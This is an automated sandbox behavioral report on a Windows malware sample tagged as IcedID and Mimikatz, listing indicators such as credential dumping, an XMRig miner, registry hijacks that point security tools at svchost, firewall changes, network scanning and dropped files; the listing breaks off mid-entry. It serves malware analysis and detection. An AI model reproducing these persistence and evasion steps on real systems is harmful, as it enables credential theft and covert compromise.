Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-11-2024 07:34
Behavioral task
behavioral1
Sample
2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe
-
Size
9.8MB
-
MD5
91e69467e6449f40d3b16eaecb505043
-
SHA1
c51cc29b2b524ff59d41e5a73a83951824cc49bb
-
SHA256
ba8fe6b5c6d587b9c9e720a72ebfe2165f1eb9abc329c67f9503867ea86b7c9e
-
SHA512
72aa66007729c58c872548fc71f3bda1350cbaa09d13331f96023660aaaf1da82334f07322393bf63175cc02845295e0ee606410b316801c5a5a0c69e75b20ed
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3964 created 2132 3964 snutqkl.exe 38 -
Xmrig family
-
Contacts a large (20244) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/3980-178-0x00007FF612120000-0x00007FF612240000-memory.dmp xmrig behavioral2/memory/3980-182-0x00007FF612120000-0x00007FF612240000-memory.dmp xmrig behavioral2/memory/3980-203-0x00007FF612120000-0x00007FF612240000-memory.dmp xmrig behavioral2/memory/3980-216-0x00007FF612120000-0x00007FF612240000-memory.dmp xmrig behavioral2/memory/3980-225-0x00007FF612120000-0x00007FF612240000-memory.dmp xmrig behavioral2/memory/3980-234-0x00007FF612120000-0x00007FF612240000-memory.dmp xmrig behavioral2/memory/3980-247-0x00007FF612120000-0x00007FF612240000-memory.dmp xmrig behavioral2/memory/3980-496-0x00007FF612120000-0x00007FF612240000-memory.dmp xmrig behavioral2/memory/3980-498-0x00007FF612120000-0x00007FF612240000-memory.dmp xmrig behavioral2/memory/3980-549-0x00007FF612120000-0x00007FF612240000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4640-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4640-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000a000000023b92-5.dat mimikatz behavioral2/memory/4076-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4392-138-0x00007FF7D9B70000-0x00007FF7D9C5E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts snutqkl.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts snutqkl.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" snutqkl.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4012 netsh.exe 4576 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 4076 snutqkl.exe 3964 snutqkl.exe 1540 wpcap.exe 556 vltbbrlit.exe 4392 vfshost.exe 2188 iulpaulua.exe 2528 xohudmc.exe 4844 nspfoo.exe 3980 jtpawa.exe 2544 iulpaulua.exe 768 iulpaulua.exe 4856 iulpaulua.exe 4360 iulpaulua.exe 2436 iulpaulua.exe 4620 iulpaulua.exe 512 snutqkl.exe 4460 iulpaulua.exe 2456 iulpaulua.exe 4556 iulpaulua.exe 5080 iulpaulua.exe 3724 iulpaulua.exe 3620 iulpaulua.exe 3228 iulpaulua.exe 2844 iulpaulua.exe 3284 iulpaulua.exe 2052 iulpaulua.exe 1628 ngliteqrb.exe 6092 snutqkl.exe -
Loads dropped DLL 12 IoCs
pid Process 1540 wpcap.exe 1540 wpcap.exe 1540 wpcap.exe 1540 wpcap.exe 1540 wpcap.exe 1540 wpcap.exe 1540 wpcap.exe 1540 wpcap.exe 1540 wpcap.exe 556 vltbbrlit.exe 556 vltbbrlit.exe 556 vltbbrlit.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ifconfig.me 68 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 snutqkl.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\nspfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 snutqkl.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\nspfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 snutqkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 snutqkl.exe -
resource yara_rule behavioral2/files/0x0008000000023c49-135.dat upx behavioral2/memory/4392-136-0x00007FF7D9B70000-0x00007FF7D9C5E000-memory.dmp upx behavioral2/memory/4392-138-0x00007FF7D9B70000-0x00007FF7D9C5E000-memory.dmp upx behavioral2/files/0x0008000000023c80-141.dat upx behavioral2/memory/2188-142-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/2188-160-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/3980-165-0x00007FF612120000-0x00007FF612240000-memory.dmp upx behavioral2/files/0x0016000000023c6a-163.dat upx behavioral2/memory/2544-171-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/768-175-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/3980-178-0x00007FF612120000-0x00007FF612240000-memory.dmp upx behavioral2/memory/4856-180-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/3980-182-0x00007FF612120000-0x00007FF612240000-memory.dmp upx behavioral2/memory/4360-185-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/2436-189-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/4620-193-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/4460-201-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/3980-203-0x00007FF612120000-0x00007FF612240000-memory.dmp upx behavioral2/memory/2456-206-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/4556-210-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/5080-214-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/3980-216-0x00007FF612120000-0x00007FF612240000-memory.dmp upx behavioral2/memory/3724-219-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/3620-223-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/3980-225-0x00007FF612120000-0x00007FF612240000-memory.dmp upx behavioral2/memory/3228-228-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/2844-231-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/3284-233-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/3980-234-0x00007FF612120000-0x00007FF612240000-memory.dmp upx behavioral2/memory/2052-236-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp upx behavioral2/memory/3980-247-0x00007FF612120000-0x00007FF612240000-memory.dmp upx behavioral2/memory/3980-496-0x00007FF612120000-0x00007FF612240000-memory.dmp upx behavioral2/memory/3980-498-0x00007FF612120000-0x00007FF612240000-memory.dmp upx behavioral2/memory/3980-549-0x00007FF612120000-0x00007FF612240000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\fpibtvet\snutqkl.exe 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe File created C:\Windows\mtemsclch\UnattendGC\specials\coli-0.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\crli-0.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\trch-1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\docmicfg.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\svschost.xml snutqkl.exe File created C:\Windows\mtemsclch\Corporate\vfshost.exe snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\ip.txt snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\Packet.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\ssleay32.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\spoolsrv.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\docmicfg.xml snutqkl.exe File opened for modification C:\Windows\fpibtvet\spoolsrv.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\AppCapture64.dll snutqkl.exe File created C:\Windows\fpibtvet\snutqkl.exe 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe File created C:\Windows\mtemsclch\taatftcev\ngliteqrb.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\cnli-1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\trfo-2.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\schoedcl.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\posh-0.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\xdvl-0.dll snutqkl.exe File opened for modification C:\Windows\fpibtvet\docmicfg.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\AppCapture32.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\svschost.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\spoolsrv.xml snutqkl.exe File opened for modification C:\Windows\fpibtvet\svschost.xml snutqkl.exe File opened for modification C:\Windows\mtemsclch\taatftcev\Packet.dll snutqkl.exe File created C:\Windows\fpibtvet\spoolsrv.xml snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\wpcap.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\docmicfg.exe snutqkl.exe File created C:\Windows\ime\snutqkl.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\tucl-1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\ucl.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\vimpcsvc.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\vimpcsvc.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\schoedcl.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\Shellcode.ini snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\wpcap.exe snutqkl.exe File created C:\Windows\fpibtvet\schoedcl.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\tibe-2.dll snutqkl.exe File created C:\Windows\mtemsclch\Corporate\mimilib.dll snutqkl.exe File created C:\Windows\fpibtvet\vimpcsvc.xml snutqkl.exe File opened for modification C:\Windows\fpibtvet\vimpcsvc.xml snutqkl.exe File opened for modification C:\Windows\fpibtvet\schoedcl.xml snutqkl.exe File opened for modification C:\Windows\mtemsclch\Corporate\log.txt cmd.exe File created C:\Windows\mtemsclch\UnattendGC\specials\libeay32.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\exma-1.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\libxml2.dll snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\svschost.exe snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\spoolsrv.exe snutqkl.exe File created C:\Windows\fpibtvet\svschost.xml snutqkl.exe File created C:\Windows\fpibtvet\docmicfg.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\specials\zlib1.dll snutqkl.exe File created C:\Windows\mtemsclch\upbdrjv\swrpwe.exe snutqkl.exe File created C:\Windows\mtemsclch\taatftcev\scan.bat snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\vimpcsvc.xml snutqkl.exe File created C:\Windows\mtemsclch\UnattendGC\schoedcl.xml snutqkl.exe File created C:\Windows\mtemsclch\Corporate\mimidrv.sys snutqkl.exe File opened for modification C:\Windows\mtemsclch\taatftcev\Result.txt ngliteqrb.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4188 sc.exe 1848 sc.exe 2172 sc.exe 4876 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language snutqkl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened 